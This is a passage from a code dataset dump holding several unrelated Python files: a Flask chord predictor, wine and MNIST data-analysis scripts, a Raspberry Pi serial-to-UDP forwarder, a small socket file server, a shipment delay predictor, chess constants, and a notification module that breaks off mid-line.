0\n\n@app.route(\"/\")\ndef main():\n return render_template('index.html', reload = time.time())\n\n@app.route(\"/api/convert\")\ndef convert():\n notes = str(request.args.get('notes', ''))\n #print('Notes', notes)\n\n notes = json.loads(notes)\n #print(notes)\n result = \"\"\n pre_chord = 0\n for m in notes:\n #print (m['C'], m['D'], m['E'], m['F'], m['G'], m['A'], m['B'])\n sum = int(m['C']) + int(m['D']) + int(m['E']) + int(m['F'])\\\n + int(m['G']) + int(m['A']) + int(m['B'])\n a = [m['C'], m['D'], m['E'], m['F'], m['G'], m['A'], m['B'], pre_chord]\n numpy_array = np.array([a])\n #print(numpy_array)\n input = pd.DataFrame(data=numpy_array)\n chord = loaded_model.predict(input)\n #print(chord)\n pre_chord = convertPreChord(chord)\n result = result + str(chord[0].lower()) + str(sum) + \" | \"\n result = result[:-3] # trim tail\n #print(result)\n return result\n\napp.run(host='0.0.0.0', port= 8080)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"120025233","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.impute import KNNImputer\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n\r\n# 读取数据\r\ndef readdata():\r\n path1 = './winereviews/winemag-data_first150k.csv'\r\n path2 = './winereviews/winemag-data-130k-v2.csv'\r\n train1 = pd.read_csv(path1)\r\n train2 = pd.read_csv(path2)\r\n return train1, train2\r\n\r\n# 数据摘要\r\ndef data_abstract(train1, train2):\r\n counts1 = train1['country'].value_counts()\r\n print(\"---counts1---\")\r\n print(counts1)\r\n counts2 = train2['country'].value_counts()\r\n print(\"---counts2---\")\r\n print(counts2)\r\n m1 = train1.describe()\r\n print(\"---m1---\")\r\n print(m1)\r\n n1 = train1.isnull().sum()\r\n print(\"---n1---\")\r\n print(n1)\r\n m2 = train2.describe()\r\n print(\"---m2---\")\r\n print(m2)\r\n n2 = train2.isnull().sum()\r\n print(\"---n2---\")\r\n print(n2)\r\n\r\n# 数据可视化\r\ndef data_visual(train1):\r\n plt.figure(figsize=(15, 8))\r\n plt.subplot(221)\r\n sns.countplot(train1.price)\r\n # sns.distplot(train1.price)\r\n plt.title('price')\r\n plt.subplot(222)\r\n # plt.figure(figsize=(15,5))\r\n sns.countplot(train1.points)\r\n plt.title('points')\r\n plt.subplot(223)\r\n plt.boxplot(train1.price.dropna())\r\n plt.title('price')\r\n plt.subplot(224)\r\n plt.boxplot(train1.points)\r\n plt.title('points')\r\n plt.show()\r\n\r\n# 剔除缺失部分\r\ndef data_fill_1(train1):\r\n plt.figure(figsize=(15, 8))\r\n plt.subplot(311)\r\n sns.countplot(train1.price)\r\n plt.title('price_old')\r\n plt.subplot(313)\r\n sns.countplot(train1.price.dropna())\r\n plt.title('price_new')\r\n plt.show()\r\n\r\n# 用最高频率填补缺失值\r\ndef data_fill_2(train1):\r\n plt.figure(figsize=(15, 8))\r\n plt.subplot(221)\r\n sns.countplot(train1.price)\r\n plt.title('price_old')\r\n plt.subplot(222)\r\n sns.countplot(train1.price.fillna(train1['price'].value_counts().index[0]))\r\n plt.title('price_new')\r\n plt.subplot(223)\r\n plt.boxplot(train1.price.dropna())\r\n plt.title('price_old')\r\n plt.subplot(224)\r\n plt.boxplot(train1.price.fillna(train1['price'].value_counts().index[0]))\r\n plt.title('price_new')\r\n plt.show()\r\n\r\n# 通过属性的相关关系来填补缺失值\r\ndef data_fill_3(data1):\r\n data_pred = data1[np.isnan(data1['price'])]\r\n known_price = data1[data1.price.notnull()].values\r\n y = known_price[:, 0] # price\r\n x = known_price[:, 1:] # points\r\n line_reg = LinearRegression()\r\n line_reg.fit(x, y)\r\n data_pred['price'] = line_reg.predict(data_pred['points'].values.reshape(-1, 1))\r\n data1.loc[(data1.price.isnull()), 'price'] = data_pred['price']\r\n print(data1.shape)\r\n print(data1.isnull().sum())\r\n\r\n# 通过数据对象之间的相似性来填补缺失值\r\ndef data_fill_null_4(data):\r\n data_copy = data.copy(deep=True)\r\n data_copy[['points', 'price']] = data_copy[['points', 'price']].replace(0, np.NaN)\r\n # null_index = data_copy.loc[data_copy['price'].isnull(), :].index\r\n imputer = KNNImputer(n_neighbors=3)\r\n data_copy[['points', 'price']] = imputer.fit_transform(data_copy[['points', 'price']])\r\n # print(data_copy.isnull().sum())\r\n # imputer = KNNImputer(n_neighbors=2)\r\n # imputer.fit_transform(data.price)\r\n # sns.countplot(data.price)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n train1, train2 = readdata()\r\n data_abstract(train1, train2)\r\n data_visual(train1)\r\n # data_visual(train2)\r\n data_fill_1(train1)\r\n # data_fill_1(train2)\r\n data_fill_2(train1)\r\n # data_fill_2(train2)\r\n data_fill_3(train1[['points', 'price']])\r\n # data_fill_3(train2[['points', 'price']])\r\n data_fill_null_4(train1[['points', 'price']])\r\n # data_fill_null_4(data=train2[['points', 'price']])\r\n\r\n","sub_path":"DataMining/Wine.py","file_name":"Wine.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"128546865","text":"\n\n#calss header\nclass _CINDERELLA():\n\tdef __init__(self,): \n\t\tself.name = \"CINDERELLA\"\n\t\tself.definitions = [u'a girl in a traditional story who was badly treated by her sisters but who met and married a prince', u'someone or something that is given little attention or care, especially less than they deserve: ', u'someone or something, especially a sports team, that achieves success when people think they are very unlikely to: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_cinderella.py","file_name":"_cinderella.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"363874670","text":"# -*- coding:utf-8 -*-\n# python 2\nimport serial\nimport socket\n\nhost = \"192.168.0.9\" #お使いのサーバーのホスト名を入れます\nport = 49152 #適当なPORTを指定してあげます\n#client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#client.connect((host, port)) #これでサーバーに接続します\n\nser = serial.Serial('/dev/ttyAMA0', 115200, timeout=None)\n\nwhile True:\n #line = ser.readline()\n recv = ser.read(2) #recv is str\n #print(type(recv))\n #print(line.rstrip())\n ####print(recv)\n #client.send(line.rstrip())\n #client.send(recv)\n client.sendto(recv, (host, port))\nser.close()\n","sub_path":"raspi/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"401029172","text":"\"\"\"\nFollow the PCA Example with Scikit Learn to complete this question\n\n3a. Apply PCA to the training data from the MNIST dataset above (x_train_mnist).\nPrint the top 30 eigenvalues. [10 marks]\n3b. Plot the cumulative variances captured by the top 30 PCs (plot 30 values in\ntotal, e.g., the cumulative variance for the top 5 PCs is the summation of variance\ncaptured by the top 5 PCs). Also print out the results (30 values). [10 marks]\n3c. Visualise the top 10 eigenvectors as images. Describe what you can observe.\n[10 marks]\n3d. Use the top 10 PCs to reconstruct all the original images as x_train_mnist_approx.\nCompute and print the mean squared error over all images (resulting in a single value).\nShow any 10 pairs of reconstructed and original images. [15 marks]\n\"\"\"\nfrom sklearn.decomposition import PCA\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# initial the training / testing data set\nmnist = tf.keras.datasets.mnist\n(x_train_mnist, y_train_mnist), (x_test_mnist, y_test_mnist) = mnist.load_data()\nx_train_mnist, x_test_mnist = x_train_mnist / 255.0, x_test_mnist / 255.0\n\n# shape\nn_train_sample = x_train_mnist.shape[0]\nh, w = x_train_mnist.shape[1], x_train_mnist.shape[2]\nn_feature = h * w\nn_eigenvalue = 30\n\n# reshape x_train into 2 dimension\nx_train_reshape = x_train_mnist.reshape(n_train_sample, n_feature)\n\n# --------------------------------- 3a -----------------------------------\npca = PCA(n_components=n_eigenvalue, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape)\nprint(\"The top 30 eigenvalues are \\n\", pca.explained_variance_)\n\n# --------------------------------- 3b -----------------------------------\nplt.figure(31)\nx_axis = np.linspace(1, 30, num=30, dtype=int)\ncumsum_vars = np.cumsum(pca.explained_variance_)\nplt.plot(x_axis, cumsum_vars)\nplt.xticks(np.arange(1, 31, step=1))\nplt.title('The cumulative variance captured by the top 30 PCs')\nplt.ylabel('Cumulative Variance'), plt.xlabel('The $i^{th}$ top PC')\nplt.grid()\nplt.show()\nprint(\"Their cumulative variances are: \\n\", cumsum_vars)\n\n# --------------------------------- 3c -----------------------------------\nplt.figure(32)\nplt.title('The image of top ten eigenvectors')\nfor i in range(10):\n img = pca.components_[i].reshape((h, w))\n plt.subplot(2, 5, i+1)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(img)\n\n# --------------------------------- 3d -----------------------------------\npca = PCA(n_components=10, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape)\nx_train_mnist_approx = pca.transform(x_train_reshape)\nx_reconstruction = pca.inverse_transform(x_train_mnist_approx)\n\n# compute the mean squared error over all images\nmse = (np.subtract(x_train_reshape, x_reconstruction)**2).sum() / n_train_sample/w/h\nprint('The mean squared error over all images is: ', mse)\n\n# plot paired original and reconstructed images\nplt.figure(33, figsize=(8, 20))\nfor i in range(10):\n # plot original\n plt.subplot(10, 2, 2*i+1)\n plt.title('The ' + str(i+1) + 'th original image')\n plt.xticks([])\n plt.yticks([])\n img = x_train_mnist[i]\n plt.imshow(img)\n\n # plot reconstructed\n plt.subplot(10, 2, 2*i+2)\n plt.title('The ' + str(i+1) + 'th reconstructed image')\n plt.xticks([])\n plt.yticks([])\n img = x_reconstruction[i].reshape((h, w))\n plt.imshow(img)\nplt.show(33)\n\n# --------------------------------- 4a -----------------------------------\nmask2, mask5 = y_train_mnist == 2, y_train_mnist == 5\nmask = mask2 | mask5\nx_train_dig2, y_train_dig2 = x_train_mnist[mask], y_train_mnist[mask]\nn_train_dig2 = x_train_dig2.shape[0]\nh2, w2 = x_train_dig2.shape[1], x_train_dig2.shape[2]\nx_train_reshape_dig2 = x_train_dig2.reshape((n_train_dig2, h2*w2))\n\npca2 = PCA(n_components=10, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape_dig2)\n\nplt.figure(41)\nfor i in range(10):\n img = pca2.components_[i].reshape((h2, w2))\n plt.subplot(2, 5, i+1)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(img)\nplt.show()\n\n# --------------------------------- 4b -----------------------------------\nmask22, mask55 = y_train_dig2 == 2, y_train_dig2 == 5\npca3 = PCA(n_components=2, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape_dig2)\nx_train_dig2_approx = pca3.transform(x_train_reshape_dig2)\ndig2, dig5 = x_train_dig2_approx[mask22], x_train_dig2_approx[mask55]\n\nplt.figure(42)\nplt.scatter(dig2[:, 0], dig2[:, 1], marker='x', label='digit 2', alpha=0.4)\nplt.scatter(dig5[:, 0], dig5[:, 1], marker='+', label='digit 5', alpha=0.4)\nplt.xlabel('$y_1$')\nplt.ylabel('$y_2$')\nplt.legend()\nplt.show()\n\n# --------------------------------- 4c -----------------------------------\nfrom sklearn.cluster import KMeans\nkmeans = KMeans(n_clusters=2, random_state=0).fit(x_train_dig2_approx)\nmask0, mask1 = kmeans.labels_ == 0, kmeans.labels_ == 1\nx0, x1 = x_train_dig2_approx[mask0], x_train_dig2_approx[mask1]\nplt.figure(43)\nplt.xlabel('$y_1$')\nplt.ylabel('$y_2$')\nplt.scatter(x0[:, 0], x0[:, 1], label='cluster 0', marker='+')\nplt.scatter(x1[:, 0], x1[:, 1], label='cluster 1', marker='x')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], label='center', marker='^', c='k')\nplt.show()\n","sub_path":"warm/Lab7_2.py","file_name":"Lab7_2.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545663503","text":"#!/usr/bin/python3\nimport os\nimport sys\n\nimport socket\n\ndef sender(cliaddr,conn,requestedFile):\n f1=open(requestedFile,'r')\n \n\n\n\n\ndef client(conn,cliaddr):\n msg=\"These are the available files enter the number of the file you want to download:\\n\"\n files=os.listdir('hostedFiles')\n print(files)\n number=0\n for i in files:\n msg=msg+str(number)+\": \"+i+\"\\n\"\n number+=1\n os.chdir('hostedFiles')\n print(msg)\n conn.send(msg.encode('ascii'))\n requestedFile=conn.recv(4)\n requestedFile=int(requestedFile)\n if requestedFile>=0 and requestedFile<=number:\n print(cliaddr,\" requested: \",files[requestedFile])\n msg=\"Getting your file\"\n conn.send(msg.encode('ascii'))\n else:\n print(cliaddr,\" requested invalid file\")\n msg=\"Bad request\"\n conn.send(msg.encode('ascii'))\n return\n sender(cliaddr,conn,files[requestedFile])\n\n return\nl=sys.argv\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind(('127.0.0.1',5500))\ns.listen(10)\nwhile True:\n conn,cliaddr=s.accept()\n print(\"Got connection from: \", cliaddr)\n client(conn,cliaddr)\n break\n","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381393361","text":"import pyodbc\nimport pandas as pd\nimport numpy as np\nimport math\nimport datetime\nimport os\nfrom patsy import dmatrices,dmatrix\nfrom sklearn.linear_model import LogisticRegression\n\nnow = datetime.datetime.now()\nnow_tz=datetime.datetime.now().astimezone().tzinfo\nnow = pd.Timestamp(now).tz_localize(now_tz)\n\n\ndef get_dummies(data):\n dummies=pd.get_dummies(data['Code'])\n data['Appt_dummy']=dummies['Appt'].tolist()\n data['Notice_dummy']=dummies['Notice'].tolist()\n data['Open_dummy']=dummies['Open'].tolist()\n return data\n\ndef generate_results(daily_results):\n progress =[\"Available\", \"Covered\", \"Dispatched\", \"Loading Start\", \"Picked Up\", \"Unloading Start\", \"Delivered\",\n \"Invoiced\"]\n # loadtype<-c\n result_file=\"DelayPredictor\" + now.strftime(\"%Y%m%d%H%M\")+\".csv\"\n stoptype =[\"PickUp\", \"Delivery\"]\n\n columnnames =['LoadID','ProgressType','Parent_Customer','LoadType','NextStop_Type','NextStop_City/State','ETA','RiskScore','LeadingReason']\n result_df = pd.DataFrame( columns=columnnames)\n loadids=set (daily_results['LoadID'].tolist())\n for lid in loadids:\n loaddata=daily_results[daily_results['LoadID']==lid]\n if len(loaddata[loaddata['arrived']== 0])>0:\n nextstop=loaddata[loaddata['arrived']== 0].iloc[0] #needs to verify whether it is loc or iloc\n stop_result={'LoadID':lid,\n 'ProgressType': progress[int(loaddata.iloc[0]['ProgressType'])],\n 'Parent_Customer':loaddata.iloc[0]['Customer'],\n 'LoadType':loaddata.iloc[0]['Load_M_B'],\n 'NextStop_Type': stoptype[int(nextstop['PDType'])],\n 'NextStop_City/State':nextstop['StateCode'],\n 'ETA':str(nextstop['ETA']), # there is a problem in ETA data type\n 'RiskScore':int(nextstop['RiskScore']),\n 'LeadingReason':nextstop['Reason']\n }\n result_df=result_df.append(stop_result, ignore_index=True)\n else:\n result_df =result_df.append({'LoadID':lid,\n 'ProgressType': progress[int(loaddata.iloc[0]['ProgressType'])],\n 'Parent_Customer':loaddata.iloc[0]['Customer'],\n 'LoadType':loaddata.iloc[0]['Load_M_B'],\n 'NextStop_Type':'-',\n 'NextStop_City/State':'-',\n 'ETA':'-',\n 'RiskScore':'-',\n 'LeadingReason':'-'}, ignore_index=True)\n result_df.to_csv(result_file,index=False)\n return(0)\n\ndef ontime_score(testData,threshold):\n relaxation = 0.98\n threshold=threshold * relaxation\n A_P = 1\n D_M = 0\n # thresholds<-quantile(testData$ontime_prob,c(D_level,C_level,B_level,A_level),names=FALSE)\n thresholdscore = 50.0\n for i in range(len(testData)):\n if testData['ontime_prob'].iloc[i] > threshold:\n lowerbound = threshold\n upperbound = A_P\n L_score = thresholdscore / 20\n H_score = 5\n else:\n lowerbound = D_M\n upperbound = threshold\n H_score = thresholdscore / 20\n L_score = 0\n\n testData['SafeScore'].iloc[i]=(L_score+(testData['ontime_prob'].iloc[i]-lowerbound) * (H_score-L_score) / (upperbound-lowerbound))\n return (testData)\n\ndef reason(coef,outputdata,inputdata,flag):\n if flag==1:\n names = [\"preStop_OnTime\", \"preStop_Duration\", \"dist\", \"f_rate\", \"cust_rate\"]\n reasons = [\"PreStop_Delay\", \"PreStop_Duration\", \"Distance\", \"Facility\", \"Customer\"]\n if flag==2:\n names = [\"preStop_OnTime\", \"preStop_Duration\", \"dist\", \"f_rate\", \"cust_rate\",\"carrier_rate\",\"latebooking\"]\n reasons = [\"PreStop_Delay\", \"PreStop_Duration\", \"Distance\", \"Facility\", \"Customer\",\"Carrier\",\"Late_Book\"]\n if flag==3:\n names = [\"preStop_OnTime\", \"preStop_Duration\", \"dist\", \"f_rate\", \"cust_rate\",\"carrier_rate\"]\n reasons = [\"PreStop_Delay\", \"PreStop_Duration\", \"Distance\", \"Facility\", \"Customer\",\"Carrier\"]\n refervalue =[]\n coef = coef[0][3:] # there is dimensional problem, coef is a 2d matrix, we need to be careful with that.\n #coef=coef.fillna(0, inplace=True)\n for i in range (0,len(names)):\n refervalue.append(pd.DataFrame.mean(inputdata[names[i]]))\n for i in outputdata.index:\n delta = (outputdata[names].loc[i]-refervalue).tolist() * coef\n #output['Reason'].loc[i] = np.where(output['Reason'].loc[i] == \"\" or output['Reason'].loc[i].isnull(),reasons[np.argmin(delta)],output['Reason'].loc[i])\n # we do not use np.where as it returns an array. we could use tolist() to change the one element array into a number, but it may be resource consuming\n outputdata['Reason'].loc[i] =reasons[np.argmin(delta)] if outputdata['Reason'].loc[i] == \"\" else outputdata['Reason'].loc[i]\n return (outputdata)\n\ndef gml_stage(inputdata,outputdata,flag):\n # for stage 1, no carrier is booked\n # instead of using C(Code) but dummies, will make sure there is no dimensional change, i.e. maybe some dataset do not have all the levels of categories, if we use C(), it will be one dimension less than the trainning set\n if flag==1:\n X_test = dmatrix('Appt_dummy + Notice_dummy+ preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate', outputdata,\n return_type='dataframe')\n y, X = dmatrices('ontime ~ Appt_dummy + Notice_dummy + preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate', inputdata,\n return_type='dataframe')\n elif flag==2:\n y, X = dmatrices(\n 'ontime ~ Appt_dummy + Notice_dummy + preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate + latebooking',\n inputdata, return_type='dataframe')\n X_test = dmatrix(\n 'Appt_dummy + Notice_dummy+ preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate + latebooking',\n outputdata, return_type='dataframe')\n else:\n y, X = dmatrices(\n 'ontime ~ Appt_dummy + Notice_dummy+ preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate', inputdata,\n return_type='dataframe')\n X_test = dmatrix('Appt_dummy + Notice_dummy + preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate',\n outputdata, return_type='dataframe')\n model = LogisticRegression(fit_intercept=False)\n mdl = model.fit(X, np.ravel(y))\n rate_result = model.predict(X_test)\n rate = model.predict_proba(X_test)[:,1]\n # dummy_ranks = pd.get_dummies(inputdata['Code'], prefix='Code')\n # cols_to_keep = ['preStop_OnTime','preStop_Duration','dist','f_rate','cust_rate']\n # data = inputdata[cols_to_keep].join(dummy_ranks.ix[:, 'Code_1':])\n # data['intercept'] = 1.0\n return rate,rate_result,model.coef_\n\n\ndef get_results(traindata,testdata,flag):\n for Type in set(traindata['PDType'].tolist()):\n if len(testdata[testdata['PDType']==Type].axes[0])> 0:\n rate, delay_result,coef = gml_stage(traindata[traindata['PDType'] == Type ], testdata[testdata['PDType'] == Type],flag)\n testdata['ontime_prob'][testdata['PDType'] == Type] = rate\n testdata['ontime_pred'][testdata['PDType'] == Type] = delay_result\n threshold = pd.DataFrame.mean(traindata[traindata.PDType == Type]['ontime'])\n testdata[testdata['PDType'] == Type] = ontime_score (testdata[testdata['PDType'] == Type], threshold)\n testdata['ontime_pred'][testdata['PDType'] == Type] = (rate > threshold * 0.98)\n testdata[\"Reason\"][(testdata['ETA_ontime'] == 0) & (testdata['arrived'] == 0 )& (testdata['Reason'].isin([\"\",\"NAN\"])) ] = \"ETA_Delay\"\n testdata[\"ontime_pred\"][testdata['ETA_ontime'] == 0] = -2\n if len(testdata[(testdata['PDType']==Type) & (testdata['SafeScore']<2.5) & (testdata['arrived'] == 0)].axes[0])>0:\n testdata[(testdata['PDType']==Type) &(testdata['ontime_prob']<0.95)& (testdata['arrived'] == 0)] = reason(coef,testdata[(testdata['PDType']==Type) &(testdata['ontime_prob']<0.95)& (testdata['arrived']== 0)],traindata[traindata['PDType']==Type],flag)\n return (testdata)\n\n\n\ndef delay_predictor(trainData, testData):\n\n \"\"\"main recommendation function\n\n Args:\n carrier_load: Pandas DF with historical loads for the carrier.\n trucks_df: Pandas DF with truck(s) (orig,dest,ready date, etc.) sent to search()\n \"\"\"\n testData = get_dummies(testData)\n trainData = get_dummies(trainData)\n testData['ontime_prob'] = -1\n testData['ontime_pred'] = -1\n testData['SafeScore'] = -1\n testData['RiskScore'] = -1\n testData['CheckScore'] = -1\n testData_1 = testData[testData['ProgressType'] == 1]\n if len(testData_1.axes[0]) > 0:\n testData_1[testData_1['StopSequence'] == 1] = get_results(trainData[trainData['StopSequence'] == 1],\n testData_1[testData_1['StopSequence'] == 1], 1)\n max_stop = max(testData_1.NumStops) + 1\n nrow_testData_1 = len(testData_1)\n for k in range(2, max_stop):\n for i in range(nrow_testData_1):\n if testData_1['StopSequence'].iloc[i] == k:\n if testData_1['arrived'].iloc[i - 1] == 0:\n testData_1['preStop_OnTime'].iloc[i] = testData_1['ontime_prob'].iloc[i - 1]\n testData_1[testData_1['StopSequence'] == k] = get_results(trainData[trainData['StopSequence'] > 1],\n testData_1[testData_1['StopSequence'] == k], 1)\n\n # Stage 2\n testData_2 = testData[testData['ProgressType'] > 1]\n testData_2[testData_2['StopSequence'] == 1] = get_results(trainData[trainData['StopSequence'] == 1],\n testData_2[testData_2['StopSequence'] == 1], 2)\n # testData[(testData['ProgressType'] > 1) & (testData['StopSequence'] == 1)]=Get_Results(trainData[trainData['StopSequence'] == 1],testData[(testData['ProgressType'] > 1) & (testData['StopSequence'] == 1)], 1)\n max_stop = max(testData_2.NumStops) + 1\n nrow_testData_2 = len(testData_2)\n for k in range(2, max_stop):\n # for i in testData_2.index:\n for i in range(nrow_testData_2):\n if testData_2['StopSequence'].iloc[i] == k:\n if testData_2['arrived'].iloc[i - 1] == 0:\n testData_2['preStop_OnTime'].iloc[i] = testData_2['ontime_prob'].iloc[i - 1]\n testData_2[testData_2['StopSequence'] == k] = get_results(trainData[trainData['StopSequence'] > 1],\n testData_2[testData_2['StopSequence'] == k], 3)\n # for k in range(2, max_stop):\n # #for i in testData_2.index:\n # for i in range(nrow_testData_2):\n # if testData_2['StopSequence'].iloc[i] == k:\n # if testData_2['arrived'].iloc[i - 1] == 0:\n # testData_2['preStop_OnTime'].iloc[i] = testData_2['ontime_prob'].iloc[i - 1]\n # testData_2[testData_2['StopSequence']==k]=Get_Results(trainData[trainData['StopSequence'] > 1], testData_2[testData_2['StopSequence'] == k],3)\n # testData_2_pred.append(Get_Results(trainData[trainData['StopSequence'] > 1], testData_2[testData_2['StopSequence'] == k],3))\n testData_df = pd.concat([testData_1, testData_2])\n testData_df['RiskScore'] = 100 - testData_df['SafeScore'] * 20\n\n # numstop = max(testData_df['NumStops'])\n\n # results = testData_df[[\"LoadID\", \"LoadDate\", \"Customer\", \"Load_M_B\", \"ProgressType\", \"StopSequence\",\n # \"SafeScore\", \"Reason\", \"Arrival\"]].sort(['LoadDate', 'LoadID'], ascending=[1, 0])\n testData_df['CheckScore'][(testData_df['ETA_ontime'] == 0) & (testData_df['StopSequence'] == 1) & (\n testData_df['ETA'] - testData_df['Appt'] <= datetime.timedelta(0, 90 * 60))] = 80\n testData_df['CheckScore'][(testData_df['ETA_ontime'] == 0) & (testData_df['StopSequence'] == 1) & (\n testData_df['ETA'] - testData_df['Appt'] > datetime.timedelta(0, 90 * 60))] = 20\n testData_df['CheckScore'][(testData_df['ETA_ontime'] == 0) & (testData_df['StopSequence'] > 1)] = 20\n testData_df['CheckScore'][(testData_df['arrived'] > 0) & (\n testData_df['Arrival'] - testData_df['Appt'] > datetime.timedelta(0, 60 * 60))] = 100\n testData_df['CheckScore'][(testData_df['arrived'] > 0) & (\n testData_df['Arrival'] - testData_df['Appt'] <= datetime.timedelta(0, 60 * 60))] = 0\n\n results = testData_df[\n [\"LoadID\", \"LoadDate\", \"Customer\", \"ProgressType\", \"StopSequence\", \"ontime_prob\", \"ontime_pred\",\n \"SafeScore\", \"Reason\"]]\n\n results['RiskScore_2'] = np.ceil(results['SafeScore'])\n results.to_csv(\"OnTime_Predict\" + now.strftime(\"%Y%m%d%H%M\") + \".csv\", index=False)\n testData_df.to_csv(\"testdata\" + now.strftime(\"%Y%m%d%H%M\") + \".csv\", index=False)\n\n generate_results(testData_df)\n\n return (testData_df)\n\n","sub_path":"engines/delay_predictor.py","file_name":"delay_predictor.py","file_ext":"py","file_size_in_byte":13281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613860062","text":"BLANK = None\nBLANK_CHAR = ' '\nPAWN = 'p'\nBISHOP = 'b'\nQUEEN = 'q'\nKING = 'k'\nKNIGHT = 'n'\nROOK = 'r'\nWHITE = 'white'\nBLACK = 'black'\nINVALID_PAWN_MOVE = \"Invalid pawn move.\"\nMOVE_OUT_OF_BOUNDS = \"Move position is out of bounds.\"\nINVALID_INPUT_COLOR = \"Color must be either black or white\"\nPIECE_CHARS = ['n', 'b', 'r', 'k', 'q', 'p']\nBOARD_CHARS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\nBOARD_NUMS = [i for i in range(1, 9)]\n\n\ndef get_other_color(color):\n if str(color).__eq__(WHITE):\n return BLACK\n elif str(color).__eq__(BLACK):\n return WHITE\n else:\n raise ValueError(INVALID_INPUT_COLOR)\n","sub_path":"sample/helpers/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"8211586","text":"from __future__ import absolute_import, print_function\n\nfrom flask import render_template\nfrom flask_mail import Message, sanitize_address\n\nfrom changes.config import db, mail\nfrom changes.constants import Result, Status\nfrom changes.models import (\n Job, JobPlan, TestGroup, ProjectOption, LogSource, LogChunk, ItemOption,\n Source\n)\nfrom changes.utils.http import build_uri\n\n\ndef get_test_failures(job):\n return sorted([t.name_sha for t in db.session.query(\n TestGroup.name_sha,\n ).filter(\n TestGroup.job_id == job.id,\n TestGroup.result == Result.failed,\n TestGroup.num_leaves == 0,\n )])\n\n\ndef should_notify(job):\n \"\"\"\n Compare with parent job (previous job) and confirm if current\n job provided any change in state (e.g. new failures).\n \"\"\"\n if job.result not in (Result.failed, Result.passed):\n return\n\n parent = Job.query.join(\n Source, Source.id == Job.source_id,\n ).filter(\n Source.patch_id == None, # NOQA\n Source.revision_sha != job.build.source.revision_sha,\n Job.project == job.project,\n Job.date_created < job.date_created,\n Job.status == Status.finished,\n Job.result.in_([Result.passed, Result.failed]),\n ).order_by(Job.date_created.desc()).first()\n\n # if theres no parent, this job must be at fault\n if parent is None:\n return job.result == Result.failed\n\n if job.result == Result.passed == parent.result:\n return False\n\n current_failures = get_test_failures(job)\n # if we dont have any testgroup failures, then we cannot identify the cause\n # so we must notify the individual\n if not current_failures:\n return True\n\n parent_failures = get_test_failures(parent)\n if parent_failures != current_failures:\n return True\n\n return False\n\n\ndef get_log_clipping(logsource, max_size=5000, max_lines=25):\n queryset = LogChunk.query.filter(\n LogChunk.source_id == logsource.id,\n )\n tail = queryset.order_by(LogChunk.offset.desc()).limit(1).first()\n\n chunks = list(queryset.filter(\n (LogChunk.offset + LogChunk.size) >= max(tail.offset - max_size, 0),\n ).order_by(LogChunk.offset.asc()))\n\n clipping = ''.join(l.text for l in chunks).strip()[-max_size:]\n # only return the last 25 lines\n clipping = '\\r\\n'.join(clipping.splitlines()[-max_lines:])\n\n return clipping\n\n\ndef send_notification(job, recipients):\n # TODO(dcramer): we should send a clipping of a relevant job log\n test_failures = TestGroup.query.filter(\n TestGroup.job_id == job.id,\n TestGroup.result == Result.failed,\n TestGroup.num_leaves == 0,\n ).order_by(TestGroup.name.asc())\n num_test_failures = test_failures.count()\n test_failures = test_failures[:25]\n\n build = job.build\n\n # TODO(dcramer): we should probably find a better way to do logs\n primary_log = LogSource.query.filter(\n LogSource.job_id == job.id,\n ).order_by(LogSource.date_created.asc()).first()\n if primary_log:\n log_clipping = get_log_clipping(\n primary_log, max_size=5000, max_lines=25)\n\n subject = u\"Build {result} - {project} #{number} ({target})\".format(\n number='{0}.{1}'.format(job.build.number, job.number),\n result=unicode(job.result),\n target=build.target or build.source.revision_sha or 'Unknown',\n project=job.project.name,\n )\n\n for testgroup in test_failures:\n testgroup.uri = build_uri('/testgroups/{0}/'.format(testgroup.id.hex))\n\n job.uri = build_uri('/jobs/{0}/'.format(job.id.hex))\n build.uri = 